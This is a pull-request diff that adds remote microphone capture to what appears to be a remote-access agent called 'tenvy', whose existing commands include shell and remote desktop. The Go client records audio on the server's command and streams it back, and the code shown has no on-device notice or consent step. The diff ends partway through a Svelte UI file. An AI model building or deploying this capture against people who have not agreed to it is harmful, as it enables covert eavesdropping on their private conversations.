### PR TITLE
Implement remote audio bridge support

### DIFF
--- a/shared/types/audio.ts
+++ b/shared/types/audio.ts
@@ -1,0 +1,84 @@
+export type AudioDirection = 'input' | 'output';
+
+export type AudioStreamEncoding = 'pcm16';
+
+export interface AudioDeviceDescriptor {
+        id: string;
+        deviceId: string;
+        label: string;
+        kind: AudioDirection;
+        groupId?: string;
+        systemDefault?: boolean;
+        communicationsDefault?: boolean;
+        lastSeen: string;
+}
+
+export interface AudioDeviceInventory {
+        inputs: AudioDeviceDescriptor[];
+        outputs: AudioDeviceDescriptor[];
+        capturedAt: string;
+        requestId?: string;
+}
+
+export interface AudioDeviceInventoryState {
+        inventory?: AudioDeviceInventory | null;
+        pending?: boolean;
+}
+
+export interface AudioDeviceRefreshResponse {
+        requestId: string;
+}
+
+export interface AudioStreamFormat {
+        encoding: AudioStreamEncoding;
+        sampleRate: number;
+        channels: number;
+}
+
+export interface AudioStreamChunk {
+        sessionId: string;
+        sequence: number;
+        timestamp: string;
+        format: AudioStreamFormat;
+        data: string;
+}
+
+export interface AudioSessionState {
+        sessionId: string;
+        agentId: string;
+        deviceId?: string;
+        deviceLabel?: string;
+        direction: AudioDirection;
+        format: AudioStreamFormat;
+        startedAt: string;
+        lastUpdatedAt?: string;
+        active: boolean;
+        lastSequence?: number;
+}
+
+export interface AudioSessionResponse {
+        session: AudioSessionState | null;
+}
+
+export interface AudioSessionRequest {
+        deviceId?: string;
+        deviceLabel?: string;
+        direction?: AudioDirection;
+        sampleRate?: number;
+        channels?: number;
+        encoding?: AudioStreamEncoding;
+}
+
+export type AudioControlAction = 'enumerate' | 'inventory' | 'start' | 'stop';
+
+export interface AudioControlCommandPayload {
+        action: AudioControlAction;
+        requestId?: string;
+        sessionId?: string;
+        deviceId?: string;
+        deviceLabel?: string;
+        direction?: AudioDirection;
+        sampleRate?: number;
+        channels?: number;
+        encoding?: AudioStreamEncoding;
+}

--- a/shared/types/messages.ts
+++ b/shared/types/messages.ts
@@ -1,8 +1,15 @@
 import type { AgentConfig } from './config';
 import type { AgentMetrics, AgentStatus } from './agent';
 import type { RemoteDesktopCommandPayload } from './remote-desktop';
+import type { AudioControlCommandPayload } from './audio';
 
-export type CommandName = 'ping' | 'shell' | 'remote-desktop' | 'system-info' | 'open-url';
+export type CommandName =
+        | 'ping'
+        | 'shell'
+        | 'remote-desktop'
+        | 'system-info'
+        | 'open-url'
+        | 'audio-control';
 
 export interface PingCommandPayload {
         message?: string;
@@ -30,7 +37,8 @@ export type CommandPayload =
         | ShellCommandPayload
         | RemoteDesktopCommandPayload
         | SystemInfoCommandPayload
-        | OpenUrlCommandPayload;
+        | OpenUrlCommandPayload
+        | AudioControlCommandPayload;
 
 export interface CommandInput {
         name: CommandName;

--- a/tenvy-client/cmd/audio_control.go
+++ b/tenvy-client/cmd/audio_control.go
@@ -1,0 +1,552 @@
+package main
+
+import (
+	"bytes"
+	"context"
+	"encoding/base64"
+	"encoding/hex"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"net/http"
+	"net/url"
+	"strings"
+	"sync"
+	"sync/atomic"
+	"time"
+	"unsafe"
+
+	"github.com/gen2brain/malgo"
+)
+
+type AudioDirection string
+
+const (
+	AudioDirectionInput  AudioDirection = "input"
+	AudioDirectionOutput AudioDirection = "output"
+)
+
+type AudioDeviceDescriptor struct {
+	ID                    string         `json:"id"`
+	DeviceID              string         `json:"deviceId"`
+	Label                 string         `json:"label"`
+	Kind                  AudioDirection `json:"kind"`
+	GroupID               string         `json:"groupId"`
+	SystemDefault         bool           `json:"systemDefault"`
+	CommunicationsDefault bool           `json:"communicationsDefault"`
+	LastSeen              string         `json:"lastSeen"`
+}
+
+type AudioDeviceInventory struct {
+	Inputs     []AudioDeviceDescriptor `json:"inputs"`
+	Outputs    []AudioDeviceDescriptor `json:"outputs"`
+	CapturedAt string                  `json:"capturedAt"`
+	RequestID  string                  `json:"requestId,omitempty"`
+}
+
+type AudioStreamFormat struct {
+	Encoding   string `json:"encoding"`
+	SampleRate int    `json:"sampleRate"`
+	Channels   int    `json:"channels"`
+}
+
+type AudioStreamChunk struct {
+	SessionID string            `json:"sessionId"`
+	Sequence  uint64            `json:"sequence"`
+	Timestamp string            `json:"timestamp"`
+	Format    AudioStreamFormat `json:"format"`
+	Data      string            `json:"data"`
+}
+
+type AudioControlCommandPayload struct {
+	Action      string         `json:"action"`
+	RequestID   string         `json:"requestId,omitempty"`
+	SessionID   string         `json:"sessionId,omitempty"`
+	DeviceID    string         `json:"deviceId,omitempty"`
+	DeviceLabel string         `json:"deviceLabel,omitempty"`
+	Direction   AudioDirection `json:"direction,omitempty"`
+	SampleRate  int            `json:"sampleRate,omitempty"`
+	Channels    int            `json:"channels,omitempty"`
+	Encoding    string         `json:"encoding,omitempty"`
+}
+
+type AudioBridge struct {
+	agent    *Agent
+	mu       sync.Mutex
+	sessions map[string]*AudioStreamSession
+}
+
+type AudioStreamSession struct {
+	agent      *Agent
+	id         string
+	deviceID   string
+	deviceName string
+	direction  AudioDirection
+	format     AudioStreamFormat
+
+	ctx    *malgo.AllocatedContext
+	device *malgo.Device
+
+	buffers   chan []byte
+	runCtx    context.Context
+	runCancel context.CancelFunc
+	stopped   atomic.Bool
+	sequence  uint64
+
+	deviceToken malgo.DeviceID
+	useDeviceID bool
+	done        chan struct{}
+}
+
+func NewAudioBridge(agent *Agent) *AudioBridge {
+	return &AudioBridge{
+		agent:    agent,
+		sessions: make(map[string]*AudioStreamSession),
+	}
+}
+
+func (b *AudioBridge) Shutdown() {
+	b.mu.Lock()
+	sessions := make([]*AudioStreamSession, 0, len(b.sessions))
+	for _, session := range b.sessions {
+		sessions = append(sessions, session)
+	}
+	b.sessions = make(map[string]*AudioStreamSession)
+	b.mu.Unlock()
+
+	for _, session := range sessions {
+		session.stop()
+		session.wait(2 * time.Second)
+	}
+}
+
+func (b *AudioBridge) HandleCommand(ctx context.Context, cmd Command) CommandResult {
+	completedAt := time.Now().UTC().Format(time.RFC3339Nano)
+
+	var payload AudioControlCommandPayload
+	if len(cmd.Payload) > 0 {
+		if err := json.Unmarshal(cmd.Payload, &payload); err != nil {
+			return CommandResult{
+				CommandID:   cmd.ID,
+				Success:     false,
+				Error:       fmt.Sprintf("invalid audio control payload: %v", err),
+				CompletedAt: completedAt,
+			}
+		}
+	}
+
+	action := strings.TrimSpace(strings.ToLower(payload.Action))
+	var err error
+	switch action {
+	case "enumerate", "inventory":
+		err = b.publishInventory(ctx, payload.RequestID)
+	case "start":
+		err = b.startSession(ctx, payload)
+	case "stop":
+		err = b.stopSession(payload.SessionID)
+	case "":
+		err = errors.New("missing audio control action")
+	default:
+		err = fmt.Errorf("unsupported audio control action: %s", payload.Action)
+	}
+
+	if err != nil {
+		return CommandResult{
+			CommandID:   cmd.ID,
+			Success:     false,
+			Error:       err.Error(),
+			CompletedAt: time.Now().UTC().Format(time.RFC3339Nano),
+		}
+	}
+
+	return CommandResult{
+		CommandID:   cmd.ID,
+		Success:     true,
+		CompletedAt: time.Now().UTC().Format(time.RFC3339Nano),
+	}
+}
+
+func (b *AudioBridge) publishInventory(ctx context.Context, requestID string) error {
+	inventory, err := captureAudioInventory()
+	if err != nil {
+		return err
+	}
+	inventory.RequestID = requestID
+
+	data, err := json.Marshal(inventory)
+	if err != nil {
+		return err
+	}
+
+	endpoint := fmt.Sprintf("%s/api/agents/%s/audio/devices", b.agent.baseURL, url.PathEscape(b.agent.id))
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, endpoint, bytes.NewReader(data))
+	if err != nil {
+		return err
+	}
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Accept", "application/json")
+	req.Header.Set("User-Agent", userAgent())
+	if strings.TrimSpace(b.agent.key) != "" {
+		req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", b.agent.key))
+	}
+
+	resp, err := b.agent.client.Do(req)
+	if err != nil {
+		return err
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode >= 300 {
+		return fmt.Errorf("inventory publish failed: status %d", resp.StatusCode)
+	}
+	return nil
+}
+
+func (b *AudioBridge) startSession(ctx context.Context, payload AudioControlCommandPayload) error {
+	sessionID := strings.TrimSpace(payload.SessionID)
+	if sessionID == "" {
+		return errors.New("audio session identifier is required")
+	}
+
+	direction := payload.Direction
+	if direction == "" {
+		direction = AudioDirectionInput
+	}
+	if direction != AudioDirectionInput {
+		return fmt.Errorf("audio direction %s is not supported", direction)
+	}
+
+	channels := payload.Channels
+	if channels <= 0 {
+		channels = 1
+	}
+	if channels > 2 {
+		channels = 2
+	}
+
+	sampleRate := payload.SampleRate
+	if sampleRate <= 0 {
+		sampleRate = 48000
+	}
+
+	encoding := strings.TrimSpace(payload.Encoding)
+	if encoding == "" {
+		encoding = "pcm16"
+	}
+	if encoding != "pcm16" {
+		return fmt.Errorf("unsupported audio encoding: %s", encoding)
+	}
+
+	session := &AudioStreamSession{
+		agent:      b.agent,
+		id:         sessionID,
+		deviceID:   strings.TrimSpace(payload.DeviceID),
+		deviceName: strings.TrimSpace(payload.DeviceLabel),
+		direction:  direction,
+		format: AudioStreamFormat{
+			Encoding:   encoding,
+			SampleRate: sampleRate,
+			Channels:   channels,
+		},
+		buffers: make(chan []byte, 32),
+		done:    make(chan struct{}),
+	}
+
+	b.mu.Lock()
+	if existing, ok := b.sessions[sessionID]; ok {
+		b.mu.Unlock()
+		existing.stop()
+		existing.wait(2 * time.Second)
+	} else if len(b.sessions) > 0 {
+		for _, active := range b.sessions {
+			active.stop()
+			go active.wait(2 * time.Second)
+		}
+		b.sessions = make(map[string]*AudioStreamSession)
+		b.mu.Unlock()
+	} else {
+		b.mu.Unlock()
+	}
+
+	allocatedCtx, err := malgo.InitContext(nil, malgo.ContextConfig{}, nil)
+	if err != nil {
+		return fmt.Errorf("failed to initialize audio context: %w", err)
+	}
+
+	deviceConfig := malgo.DefaultDeviceConfig(malgo.Capture)
+	deviceConfig.Capture.Format = malgo.FormatS16
+	deviceConfig.Capture.Channels = uint32(channels)
+	deviceConfig.SampleRate = uint32(sampleRate)
+	deviceConfig.Alsa.NoMMap = 1
+	deviceConfig.Capture.ShareMode = malgo.Shared
+
+	if session.deviceID != "" {
+		token, err := parseDeviceID(session.deviceID)
+		if err != nil {
+			allocatedCtx.Context.Uninit()
+			allocatedCtx.Free()
+			return fmt.Errorf("invalid device identifier: %w", err)
+		}
+		session.deviceToken = token
+		session.useDeviceID = true
+		deviceConfig.Capture.DeviceID = unsafe.Pointer(&session.deviceToken)
+	}
+
+	callbacks := malgo.DeviceCallbacks{
+		Data: func(_ []byte, input []byte, _ uint32) {
+			session.handleInput(input)
+		},
+		Stop: func() {
+			session.stopped.Store(true)
+		},
+	}
+
+	device, err := malgo.InitDevice(allocatedCtx.Context, deviceConfig, callbacks)
+	if err != nil {
+		allocatedCtx.Context.Uninit()
+		allocatedCtx.Free()
+		return fmt.Errorf("failed to initialize capture device: %w", err)
+	}
+
+	if err := device.Start(); err != nil {
+		device.Uninit()
+		allocatedCtx.Context.Uninit()
+		allocatedCtx.Free()
+		return fmt.Errorf("failed to start capture device: %w", err)
+	}
+
+	session.ctx = allocatedCtx
+	session.device = device
+	session.runCtx, session.runCancel = context.WithCancel(context.Background())
+
+	go session.run()
+
+	b.mu.Lock()
+	b.sessions[session.id] = session
+	b.mu.Unlock()
+
+	return nil
+}
+
+func (b *AudioBridge) stopSession(sessionID string) error {
+	if strings.TrimSpace(sessionID) == "" {
+		return errors.New("audio session identifier is required")
+	}
+
+	b.mu.Lock()
+	session, ok := b.sessions[sessionID]
+	if ok {
+		delete(b.sessions, sessionID)
+	}
+	b.mu.Unlock()
+
+	if !ok {
+		return nil
+	}
+
+	session.stop()
+	session.wait(2 * time.Second)
+	return nil
+}
+
+func (s *AudioStreamSession) handleInput(input []byte) {
+	if len(input) == 0 || s.stopped.Load() {
+		return
+	}
+
+	buffer := make([]byte, len(input))
+	copy(buffer, input)
+
+	select {
+	case s.buffers <- buffer:
+	default:
+		select {
+		case <-s.buffers:
+		default:
+		}
+		select {
+		case s.buffers <- buffer:
+		default:
+		}
+	}
+}
+
+func (s *AudioStreamSession) run() {
+	defer close(s.done)
+
+	endpoint := fmt.Sprintf("%s/api/agents/%s/audio/chunks", s.agent.baseURL, url.PathEscape(s.agent.id))
+
+	for {
+		select {
+		case <-s.runCtx.Done():
+			return
+		case data := <-s.buffers:
+			if data == nil || len(data) == 0 {
+				continue
+			}
+
+			chunk := AudioStreamChunk{
+				SessionID: s.id,
+				Sequence:  atomic.AddUint64(&s.sequence, 1),
+				Timestamp: time.Now().UTC().Format(time.RFC3339Nano),
+				Format:    s.format,
+				Data:      base64.StdEncoding.EncodeToString(data),
+			}
+
+			if err := s.sendChunk(endpoint, chunk); err != nil {
+				s.agent.logger.Printf("audio stream send error: %v", err)
+			}
+		}
+	}
+}
+
+func (s *AudioStreamSession) sendChunk(endpoint string, chunk AudioStreamChunk) error {
+	payload, err := json.Marshal(chunk)
+	if err != nil {
+		return err
+	}
+
+	sendCtx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+
+	req, err := http.NewRequestWithContext(sendCtx, http.MethodPost, endpoint, bytes.NewReader(payload))
+	if err != nil {
+		return err
+	}
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Accept", "application/json")
+	req.Header.Set("User-Agent", userAgent())
+	if strings.TrimSpace(s.agent.key) != "" {
+		req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", s.agent.key))
+	}
+
+	resp, err := s.agent.client.Do(req)
+	if err != nil {
+		return err
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode >= 300 {
+		return fmt.Errorf("audio chunk rejected: status %d", resp.StatusCode)
+	}
+	return nil
+}
+
+func (s *AudioStreamSession) stop() {
+	if s == nil {
+		return
+	}
+
+	if s.stopped.Swap(true) {
+		return
+	}
+
+	if s.runCancel != nil {
+		s.runCancel()
+	}
+
+	if s.device != nil {
+		_ = s.device.Stop()
+		s.device.Uninit()
+	}
+
+	if s.ctx != nil {
+		_ = s.ctx.Context.Uninit()
+		s.ctx.Free()
+	}
+}
+
+func (s *AudioStreamSession) wait(timeout time.Duration) {
+	if s == nil || s.done == nil {
+		return
+	}
+	if timeout <= 0 {
+		<-s.done
+		return
+	}
+	select {
+	case <-s.done:
+	case <-time.After(timeout):
+	}
+}
+
+func captureAudioInventory() (*AudioDeviceInventory, error) {
+	ctx, err := malgo.InitContext(nil, malgo.ContextConfig{}, nil)
+	if err != nil {
+		return nil, fmt.Errorf("failed to initialize audio context: %w", err)
+	}
+	defer func() {
+		_ = ctx.Uninit()
+		ctx.Free()
+	}()
+
+	now := time.Now().UTC().Format(time.RFC3339Nano)
+	inventory := &AudioDeviceInventory{
+		Inputs:     make([]AudioDeviceDescriptor, 0),
+		Outputs:    make([]AudioDeviceDescriptor, 0),
+		CapturedAt: now,
+	}
+
+	if playback, err := ctx.Devices(malgo.Playback); err == nil {
+		for idx, info := range playback {
+			label := strings.TrimSpace(info.Name())
+			if label == "" {
+				label = fmt.Sprintf("Playback %d", idx+1)
+			}
+			descriptor := AudioDeviceDescriptor{
+				ID:                    info.ID.String(),
+				DeviceID:              info.ID.String(),
+				Label:                 label,
+				Kind:                  AudioDirectionOutput,
+				GroupID:               "",
+				SystemDefault:         info.IsDefault != 0,
+				CommunicationsDefault: false,
+				LastSeen:              now,
+			}
+			inventory.Outputs = append(inventory.Outputs, descriptor)
+		}
+	} else {
+		return nil, fmt.Errorf("failed to enumerate playback devices: %w", err)
+	}
+
+	if capture, err := ctx.Devices(malgo.Capture); err == nil {
+		for idx, info := range capture {
+			label := strings.TrimSpace(info.Name())
+			if label == "" {
+				label = fmt.Sprintf("Microphone %d", idx+1)
+			}
+			descriptor := AudioDeviceDescriptor{
+				ID:                    info.ID.String(),
+				DeviceID:              info.ID.String(),
+				Label:                 label,
+				Kind:                  AudioDirectionInput,
+				GroupID:               "",
+				SystemDefault:         info.IsDefault != 0,
+				CommunicationsDefault: false,
+				LastSeen:              now,
+			}
+			inventory.Inputs = append(inventory.Inputs, descriptor)
+		}
+	} else {
+		return nil, fmt.Errorf("failed to enumerate capture devices: %w", err)
+	}
+
+	return inventory, nil
+}
+
+func parseDeviceID(value string) (malgo.DeviceID, error) {
+	var id malgo.DeviceID
+	trimmed := strings.TrimSpace(value)
+	if trimmed == "" {
+		return id, errors.New("empty device identifier")
+	}
+	decoded, err := hex.DecodeString(trimmed)
+	if err != nil {
+		return id, err
+	}
+	if len(decoded) > len(id) {
+		return id, errors.New("device identifier is too long")
+	}
+	copy(id[:], decoded)
+	return id, nil
+}

--- a/tenvy-client/go.mod
+++ b/tenvy-client/go.mod
@@ -4,18 +4,19 @@ go 1.22
 
 require (
 	github.com/kbinani/screenshot v0.0.0-20250624051815-089614a94018
+	github.com/lxn/win v0.0.0-20210218163916-a377121e959e
 	github.com/shirou/gopsutil/v3 v3.24.5
 	golang.org/x/image v0.18.0
 	golang.org/x/sys v0.26.0
 )
 
 require (
+	github.com/gen2brain/malgo v0.11.24 // indirect
 	github.com/gen2brain/shm v0.1.0 // indirect
 	github.com/go-ole/go-ole v1.2.6 // indirect
 	github.com/godbus/dbus/v5 v5.1.0 // indirect
 	github.com/jezek/xgb v1.1.1 // indirect
 	github.com/lufia/plan9stats v0.0.0-20211012122336-39d0f177ccd0 // indirect
-	github.com/lxn/win v0.0.0-20210218163916-a377121e959e // indirect
 	github.com/power-devops/perfstat v0.0.0-20210106213030-5aafc221ea8c // indirect
 	github.com/shoenig/go-m1cpu v0.1.6 // indirect
 	github.com/tklauser/go-sysconf v0.3.12 // indirect

--- a/tenvy-client/go.sum
+++ b/tenvy-client/go.sum
@@ -1,5 +1,7 @@
 github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
 github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/gen2brain/malgo v0.11.24 h1:hHcIJVfzWcEDHFdPl5Dl/CUSOjzOleY0zzAV8Kx+imE=
+github.com/gen2brain/malgo v0.11.24/go.mod h1:f9TtuN7DVrXMiV/yIceMeWpvanyVzJQMlBecJFVMxww=
 github.com/gen2brain/shm v0.1.0 h1:MwPeg+zJQXN0RM9o+HqaSFypNoNEcNpeoGp0BTSx2YY=
 github.com/gen2brain/shm v0.1.0/go.mod h1:UgIcVtvmOu+aCJpqJX7GOtiN7X2ct+TKLg4RTxwPIUA=
 github.com/go-ole/go-ole v1.2.6 h1:/Fpf6oFPoeFik9ty7siob0G6Ke8QvQEuVcuChpwXzpY=

--- a/tenvy-server/src/lib/components/workspace/tools/audio-control-workspace.svelte
+++ b/tenvy-server/src/lib/components/workspace/tools/audio-control-workspace.svelte
@@ -1,15 +1,7 @@
 <script lang="ts">
         import { onDestroy, onMount } from 'svelte';
         import { Button } from '$lib/components/ui/button/index.js';
-        import { Input } from '$lib/components/ui/input/index.js';
-        import { Label } from '$lib/components/ui/label/index.js';
-        import { Switch } from '$lib/components/ui/switch/index.js';
-        import {
-                Select,
-                SelectContent,
-                SelectItem,
-                SelectTrigger
-        } from '$lib/components/ui/select/index.js';
+        import { Badge } from '$lib/components/ui/badge/index.js';
         import {
                 Card,
                 CardContent,
@@ -18,1315 +10,477 @@
                 CardHeader,
                 CardTitle
         } from '$lib/components/ui/card/index.js';
-        import * as Dialog from '$lib/components/ui/dialog/index.js';
-        import { Badge } from '$lib/components/ui/badge/index.js';
         import ClientWorkspaceHero from '$lib/components/workspace/workspace-hero.svelte';
         import ActionLog from '$lib/components/workspace/action-log.svelte';
         import { getClientTool } from '$lib/data/client-tools';
         import type { Client } from '$lib/data/clients';
+        import type {
+                AudioDeviceDescriptor,
+                AudioDeviceInventory,
+                AudioSessionState,
+                AudioStreamChunk
+        } from '$lib/types/audio';
         import { appendWorkspaceLog, createWorkspaceLogEntry } from '$lib/workspace/utils';
         import type { WorkspaceLogEntry } from '$lib/workspace/types';
-
-        type AudioDirection = 'input' | 'output';
-
-        type AudioDevice = {
-                id: string;
-                deviceId: string;
-                label: string;
-                kind: AudioDirection;
-                groupId: string;
-                systemDefault: boolean;
-                communicationsDefault: boolean;
-                lastSeen: string;
-        };
-
-        type DeviceControlState = {
-                volume: number;
-                muted: boolean;
-                balance: number;
-        };
-
-        type DeviceDiagnostics = {
-                sampleRate: number | null;
-                channelCount: number | null;
-                latency: number | null;
-                echoCancellation: boolean | null;
-                noiseSuppression: boolean | null;
-                autoGainControl: boolean | null;
-        };
-
-        type PlaybackState = 'idle' | 'playing' | 'paused';
-
-        const TEST_TONE_URL = '/audio-test-tone.wav';
-        const DEFAULT_INPUT_VOLUME = 80;
-        const DEFAULT_OUTPUT_VOLUME = 70;
-
-        const isBrowser = typeof window !== 'undefined' && typeof navigator !== 'undefined';
 
         const { client } = $props<{ client: Client }>();
 
         const tool = getClientTool('audio-control');
+        const isBrowser = typeof window !== 'undefined';
 
-        let pipeline = $state<'microphone' | 'loopback' | 'dual'>('microphone');
-        let codec = $state<'opus' | 'pcm16' | 'aac'>('opus');
-        let sampleRate = $state(48000);
-        let bitrate = $state(96);
-        let pushToTalk = $state(false);
-        let noiseSuppression = $state(true);
-        let echoCancellation = $state(true);
-        let log = $state<WorkspaceLogEntry[]>([]);
+        let inventory = $state<AudioDeviceInventory | null>(null);
+        let pendingInventory = $state(false);
+        let refreshingInventory = $state(false);
+        let inventoryError = $state<string | null>(null);
 
-        let mediaSupported = $state(false);
-        let permissionState = $state<'unknown' | 'granted' | 'denied'>('unknown');
-        let enumeratingDevices = $state(false);
-        let enumerateError = $state<string | null>(null);
-        let inputs = $state<AudioDevice[]>([]);
-        let outputs = $state<AudioDevice[]>([]);
-        let selectedInputId = $state<string | null>(null);
-        let selectedOutputId = $state<string | null>(null);
-        let deviceControls = $state<Record<string, DeviceControlState>>({});
-        let deviceDiagnostics = $state<Record<string, DeviceDiagnostics>>({});
-        let detailDialogOpen = $state(false);
-        let detailDevice = $state<AudioDevice | null>(null);
-        let detailLoading = $state(false);
-        let detailError = $state<string | null>(null);
-
-        let playbackState = $state<PlaybackState>('idle');
-        let playbackPosition = $state(0);
-        let playbackDuration = $state(0);
+        let session = $state<AudioSessionState | null>(null);
+        let listening = $state(false);
+        let sessionError = $state<string | null>(null);
         let playbackError = $state<string | null>(null);
 
-        let playbackTimer: ReturnType<typeof setInterval> | null = null;
-        let audioElement: HTMLAudioElement | null = null;
+        let log = $state<WorkspaceLogEntry[]>([]);
+
+        let eventSource: EventSource | null = null;
         let audioContext: AudioContext | null = null;
-        let mediaSource: MediaElementAudioSourceNode | null = null;
-        let gainNode: GainNode | null = null;
-        let stereoPanner: StereoPannerNode | null = null;
-        let audioGraphInitialised = false;
-        let deviceChangeListener: (() => void) | null = null;
+        let playbackQueueTime = 0;
 
-        function describePlan(): string {
-                return `${pipeline} · ${codec.toUpperCase()} · ${sampleRate / 1000}kHz · ${bitrate}kbps · PTT ${
-                        pushToTalk ? 'on' : 'off'
-                } · NS ${noiseSuppression ? 'on' : 'off'}`;
-        }
-
-        function queueCapture(status: WorkspaceLogEntry['status']) {
-                log = appendWorkspaceLog(
-                        log,
-                        createWorkspaceLogEntry('Audio capture pipeline updated', describePlan(), status)
-                );
-        }
-
-        function logAction(
-                action: string,
-                detail: string,
-                status: WorkspaceLogEntry['status'] = 'complete'
-        ) {
+        function logAction(action: string, detail: string, status: WorkspaceLogEntry['status'] = 'complete') {
                 log = appendWorkspaceLog(log, createWorkspaceLogEntry(action, detail, status));
         }
 
-        function clamp(value: number, min: number, max: number): number {
-                if (!Number.isFinite(value)) {
-                        return min;
-                }
-                if (value < min) {
-                        return min;
-                }
-                if (value > max) {
-                        return max;
-                }
-                return value;
-        }
-
-        function createDefaultControl(kind: AudioDirection): DeviceControlState {
-                return {
-                        volume: kind === 'input' ? DEFAULT_INPUT_VOLUME : DEFAULT_OUTPUT_VOLUME,
-                        muted: false,
-                        balance: 0
-                } satisfies DeviceControlState;
-        }
-
-        function normaliseDeviceId(device: MediaDeviceInfo): string {
-                if (!device.deviceId || device.deviceId.length === 0) {
-                        const random = typeof crypto !== 'undefined' && typeof crypto.randomUUID === 'function'
-                                ? crypto.randomUUID()
-                                : Math.random().toString(36).slice(2, 10);
-                        return `${device.kind}-${random}`;
-                }
-                if (device.deviceId === 'default') {
-                        return `${device.kind}-default`;
-                }
-                if (device.deviceId === 'communications') {
-                        return `${device.kind}-communications`;
-                }
-                return device.deviceId;
-        }
-
-        function selectedInputLabel(): string {
-                if (!selectedInputId) {
-                        return inputs.length > 0 ? 'Auto select' : 'None';
-                }
-                const match = inputs.find((device) => device.id === selectedInputId);
-                return match?.label ?? 'None';
-        }
-
-        function selectedOutputLabel(): string {
-                if (!selectedOutputId) {
-                        return outputs.length > 0 ? 'Auto select' : 'None';
-                }
-                const match = outputs.find((device) => device.id === selectedOutputId);
-                return match?.label ?? 'None';
-        }
-
-        function permissionLabel(): string {
-                switch (permissionState) {
-                        case 'granted':
-                                return 'Granted';
-                        case 'denied':
-                                return 'Denied';
-                        default:
-                                return 'Unknown';
-                }
-        }
-
-        function deviceStatus(device: AudioDevice): string {
-                const control = deviceControls[device.id];
-                if (control?.muted) {
-                        return 'Muted';
-                }
-                if (
-                        (device.kind === 'input' && selectedInputId === device.id) ||
-                        (device.kind === 'output' && selectedOutputId === device.id)
-                ) {
-                        return 'Active';
-                }
-                return 'Available';
-        }
-
-        function formatTimestamp(value: string): string {
-                const date = new Date(value);
-                if (Number.isNaN(date.getTime())) {
-                        return value;
-                }
-                return date.toLocaleString();
-        }
-
-        function formatBalance(value: number): string {
-                const percent = Math.round(Math.abs(value) * 100);
-                if (percent === 0) {
-                        return 'Centered';
-                }
-                return value < 0 ? `Left ${percent}%` : `Right ${percent}%`;
-        }
-
-        function playbackProgressPercent(): number {
-                if (!Number.isFinite(playbackDuration) || playbackDuration <= 0) {
-                        return 0;
-                }
-                const percent = (playbackPosition / playbackDuration) * 100;
-                return clamp(Number.isFinite(percent) ? percent : 0, 0, 100);
-        }
-
-        async function refreshPermissionState() {
-                if (!isBrowser || !('permissions' in navigator)) {
+        async function loadInventory() {
+                if (!isBrowser) {
                         return;
                 }
                 try {
-                        const status = await (navigator.permissions as unknown as {
-                                query: (descriptor: { name: 'microphone' }) => Promise<PermissionStatus>;
-                        }).query({ name: 'microphone' });
-                        if (status.state === 'granted') {
-                                permissionState = 'granted';
-                        } else if (status.state === 'denied') {
-                                permissionState = 'denied';
-                        } else {
-                                permissionState = 'unknown';
+                        const response = await fetch(`/api/agents/${client.id}/audio/devices`);
+                        if (!response.ok) {
+                                throw new Error(`Status ${response.status}`);
                         }
-                } catch {
-                        // Permission API is optional; ignore failures.
+                        const body = (await response.json()) as { inventory?: AudioDeviceInventory | null; pending?: boolean };
+                        inventory = body.inventory ?? null;
+                        pendingInventory = Boolean(body.pending);
+                        inventoryError = null;
+                } catch (err) {
+                        inventoryError = (err as Error).message ?? 'Failed to load audio inventory.';
                 }
         }
 
-        async function enumerateDevices(requestAccess = false) {
-                if (!mediaSupported || !navigator.mediaDevices?.enumerateDevices) {
-                        enumerateError = 'Media devices API is not available in this environment.';
+        async function pollInventory(requestId: string) {
+                const deadline = Date.now() + 15_000;
+                while (Date.now() < deadline) {
+                        await new Promise((resolve) => setTimeout(resolve, 1000));
+                        await loadInventory();
+                        if (inventory && (!inventory.requestId || inventory.requestId === requestId)) {
+                                pendingInventory = false;
+                                logAction('Audio inventory updated', inventory.capturedAt);
+                                return;
+                        }
+                }
+                logAction('Audio inventory refresh timed out', requestId, 'failed');
+        }
+
+        async function refreshInventory() {
+                if (!isBrowser || refreshingInventory) {
                         return;
                 }
-                enumeratingDevices = true;
-                enumerateError = null;
+                refreshingInventory = true;
+                inventoryError = null;
                 try {
-                        if (requestAccess && navigator.mediaDevices.getUserMedia) {
-                                try {
-                                        const stream = await navigator.mediaDevices.getUserMedia({ audio: true });
-                                        stream.getTracks().forEach((track) => track.stop());
-                                        permissionState = 'granted';
-                                } catch (error) {
-                                        permissionState = 'denied';
-                                        throw error;
-                                }
-                        } else if (permissionState === 'unknown') {
-                                await refreshPermissionState();
+                        const response = await fetch(`/api/agents/${client.id}/audio/devices/refresh`, {
+                                method: 'POST',
+                                headers: { 'Content-Type': 'application/json' }
+                        });
+                        if (!response.ok) {
+                                throw new Error(`Status ${response.status}`);
                         }
+                        const body = (await response.json()) as { requestId: string };
+                        pendingInventory = true;
+                        logAction('Requested audio inventory refresh', body.requestId, 'pending');
+                        await pollInventory(body.requestId);
+                } catch (err) {
+                        inventoryError = (err as Error).message ?? 'Failed to refresh audio inventory.';
+                        logAction('Audio inventory refresh failed', inventoryError ?? '', 'failed');
+                } finally {
+                        refreshingInventory = false;
+                }
+        }
 
-                        const list = await navigator.mediaDevices.enumerateDevices();
-                        const nextControls: Record<string, DeviceControlState> = { ...deviceControls };
-                        const nextInputs: AudioDevice[] = [];
-                        const nextOutputs: AudioDevice[] = [];
-                        const seen = new Set<string>();
-                        let inputFallback = 1;
-                        let outputFallback = 1;
-
-                        for (const device of list) {
-                                if (device.kind !== 'audioinput' && device.kind !== 'audiooutput') {
-                                        continue;
-                                }
-                                const kind: AudioDirection = device.kind === 'audioinput' ? 'input' : 'output';
-                                const id = normaliseDeviceId(device);
-                                if (seen.has(id)) {
-                                        continue;
-                                }
-                                seen.add(id);
-                                const label =
-                                        device.label && device.label.trim().length > 0
-                                                ? device.label
-                                                : kind === 'input'
-                                                        ? `Microphone ${inputFallback++}`
-                                                        : `Output ${outputFallback++}`;
